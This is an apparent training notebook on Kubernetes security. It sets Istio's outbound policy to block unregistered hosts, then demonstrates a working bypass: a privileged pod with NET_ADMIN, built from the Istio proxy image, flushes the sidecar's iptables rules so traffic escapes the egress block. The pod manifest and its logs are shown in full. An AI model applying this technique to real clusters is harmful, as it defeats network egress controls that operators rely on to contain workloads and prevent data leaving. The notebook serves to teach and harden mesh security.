**This notebook covered by the following [license](License.ipynb)  This note must not be removed**

# Istio Egress Control and Hack

Starting [Istio Egress Control](https://istio.io/latest/docs/tasks/traffic-management/egress/egress-control/)

In [1]:
cd istio-1.12.2
pwd

/minikube-host/notebooks/training-kubernetes-security/istio-1.12.2


In [2]:
kubectl label namespace default istio-injection=enabled

error: 'istio-injection' already has a value (enabled), and --overwrite is false


: 1

# Check defaults

In [3]:
kubectl get istiooperator installed-state -n istio-system -o jsonpath='{.spec.meshConfig.outboundTrafficPolicy.mode}'


In [4]:
export PATH=$PATH:$(pwd)/bin

In [5]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=ALLOW_ANY

[32m✔[0m Istio core installed                                                          
[32m✔[0m Istiod installed                                                              
[32m✔[0m Egress gateways installed                                                     
[32m✔[0m Ingress gateways installed                                                    
[32m✔[0m Installation complete                                                         Making this installation the default for injection and validation.

Thank you for installing Istio 1.12.  Please take a few minutes to tell us about your install/upgrade experience!  https://forms.gle/FegQbc9UvePd4Z9z7


In [8]:
kubectl get istiooperator installed-state -n istio-system -o jsonpath='{.spec.meshConfig.outboundTrafficPolicy.mode}'

ALLOW_ANY

In [6]:
kubectl get deployment sleep -o yaml |grep image:

        image: pstauffer/curl


In [7]:
kubectl get pods

NAME                    READY   STATUS    RESTARTS   AGE
sleep-56bc8d768-trznv   2/2     Running   0          64m


# Create test pod

In [None]:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: sleep
  labels:
    app: sleep
spec:
  ports:
  - port: 80
    name: http
  selector:
    app: sleep
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: sleep
spec:
  replicas: 1
  selector:
    matchLabels:
      app: sleep
  template:
    metadata:
      labels:
        app: sleep
    spec:
      containers:
      - name: sleep
        image: pstauffer/curl
        command: ["/bin/sleep", "3650d"]
        imagePullPolicy: IfNotPresent
---
EOF

In [10]:
kubectl get pods

NAME                    READY   STATUS    RESTARTS   AGE
sleep-56bc8d768-trznv   2/2     Running   0          66m


In [11]:
export POD=$(kubectl get pods -l app=sleep -o jsonpath='{.items[0].metadata.name}')
echo $POD

sleep-56bc8d768-trznv


In [12]:
kubectl get pod $POD -o yaml |grep image:

    image: pstauffer/curl
    image: docker.io/istio/proxyv2:1.12.2
    image: docker.io/istio/proxyv2:1.12.2
    image: istio/proxyv2:1.12.2
    image: pstauffer/curl:latest
    image: istio/proxyv2:1.12.2


In [13]:
kubectl exec -c sleep $POD -- curl -s  heise.de

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


# Works as intended, let us block it

In [14]:
istioctl install --set profile=demo -y --set meshConfig.outboundTrafficPolicy.mode=REGISTRY_ONLY

[32m✔[0m Istio core installed                                                          
[32m✔[0m Istiod installed                                                              
[32m✔[0m Ingress gateways installed                                                    
[32m✔[0m Egress gateways installed                                                     
[32m✔[0m Installation complete                                                         Making this installation the default for injection and validation.

Thank you for installing Istio 1.12.  Please take a few minutes to tell us about your install/upgrade experience!  https://forms.gle/FegQbc9UvePd4Z9z7


In [15]:
kubectl get istiooperator installed-state -n istio-system -o jsonpath='{.spec.meshConfig.outboundTrafficPolicy.mode}'

REGISTRY_ONLY

In [16]:
kubectl exec -c sleep $POD -- curl -m 5  heise.de

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0


In [17]:
kubectl get pods $POD -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/default-container: sleep
    kubectl.kubernetes.io/default-logs-container: sleep
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"initContainers":["istio-init"],"containers":["istio-proxy"],"volumes":["istio-envoy","istio-data","istio-podinfo","istio-token","istiod-ca-cert"],"imagePullSecrets":null,"revision":"default"}'
  creationTimestamp: "2022-01-19T13:39:54Z"
  generateName: sleep-56bc8d768-
  labels:
    app: sleep
    pod-template-hash: 56bc8d768
    security.istio.io/tlsMode: istio
    service.istio.io/canonical-name: sleep
    service.istio.io/canonical-revision: latest
  name: sleep-56bc8d768-trznv
  namespace: default
  ownerReferences:
  - apiVersion: apps/v1
    blockOwnerDeletion: true
    controller: true
    kind: ReplicaSet
    name: sleep-56bc8d768
    uid: 7f7acf67-e201-42fa-88f3-156d40b85c7a
  resourceV

# The hack

- same image as above
- we use the original istio proxy image
  - iptables included
  - `NET_ADMIN` capability not detected
  - revert the iptables rules

In [18]:
kubectl apply -f -<<EOF
apiVersion: v1
kind: Pod
metadata:
  name: escape
  namespace: default
spec:
  containers:
  - name: sleep
    image: pstauffer/curl
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  - image: docker.io/istio/proxyv2:1.12.2
    name: escape
    command:
      - "/bin/bash"
    args:
      - "-c"
      - |+
        echo
        echo "########  old rules ###########"
        echo
        iptables-save
        echo
        echo "######## cleared rules ##########"
        echo
        iptables -P INPUT ACCEPT
        iptables -P FORWARD ACCEPT
        iptables -P OUTPUT ACCEPT
        iptables -t nat -F
        iptables -t mangle -F
        iptables -F
        iptables -X
        iptables-save
        sleep 3650d
    securityContext:
      capabilities:
        add:
        - NET_ADMIN
      privileged: true
  restartPolicy: Always
EOF

pod/escape created


In [19]:
kubectl get pods 

NAME                    READY   STATUS    RESTARTS   AGE
escape                  3/3     Running   0          3s
sleep-56bc8d768-trznv   2/2     Running   0          72m


In [20]:
kubectl get pods escape -o yaml

apiVersion: v1
kind: Pod
metadata:
  annotations:
    kubectl.kubernetes.io/last-applied-configuration: |
      {"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"escape","namespace":"default"},"spec":{"containers":[{"command":["/bin/sleep","3650d"],"image":"pstauffer/curl","imagePullPolicy":"IfNotPresent","name":"sleep"},{"args":["-c","echo\necho \"########  old rules ###########\"\necho\niptables-save\necho\necho \"######## cleared rules ##########\"\necho\niptables -P INPUT ACCEPT\niptables -P FORWARD ACCEPT\niptables -P OUTPUT ACCEPT\niptables -t nat -F\niptables -t mangle -F\niptables -F\niptables -X\niptables-save\nsleep 3650d\n"],"command":["/bin/bash"],"image":"docker.io/istio/proxyv2:1.12.2","name":"escape","securityContext":{"capabilities":{"add":["NET_ADMIN"]},"privileged":true}}],"restartPolicy":"Always"}}
    prometheus.io/path: /stats/prometheus
    prometheus.io/port: "15020"
    prometheus.io/scrape: "true"
    sidecar.istio.io/status: '{"initContainer

In [21]:
kubectl logs escape -c escape


########  old rules ###########

# Generated by iptables-save v1.8.4 on Wed Jan 19 14:52:22 2022
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:ISTIO_INBOUND - [0:0]
:ISTIO_IN_REDIRECT - [0:0]
:ISTIO_OUTPUT - [0:0]
:ISTIO_REDIRECT - [0:0]
-A PREROUTING -p tcp -j ISTIO_INBOUND
-A OUTPUT -p tcp -j ISTIO_OUTPUT
-A ISTIO_INBOUND -p tcp -m tcp --dport 15008 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 22 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15090 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15021 -j RETURN
-A ISTIO_INBOUND -p tcp -m tcp --dport 15020 -j RETURN
-A ISTIO_INBOUND -p tcp -j ISTIO_IN_REDIRECT
-A ISTIO_IN_REDIRECT -p tcp -j REDIRECT --to-ports 15006
-A ISTIO_OUTPUT -s 127.0.0.6/32 -o lo -j RETURN
-A ISTIO_OUTPUT ! -d 127.0.0.1/32 -o lo -m owner --uid-owner 1337 -j ISTIO_IN_REDIRECT
-A ISTIO_OUTPUT -o lo -m owner ! --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT -m owner --uid-owner 1337 -j RETURN
-A ISTIO_OUTPUT !

In [22]:
kubectl exec -it escape -c sleep -- curl -s heise.de 

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.heise.de/">here</a>.</p>
</body></html>


In [23]:
kubectl exec -it escape -c sleep -- curl -sL heise.de | wc

  22279   36649  740980


In [None]:
kubectl get pods --all-namespaces

In [None]:
istioctl 

In [None]:
istioctl analyze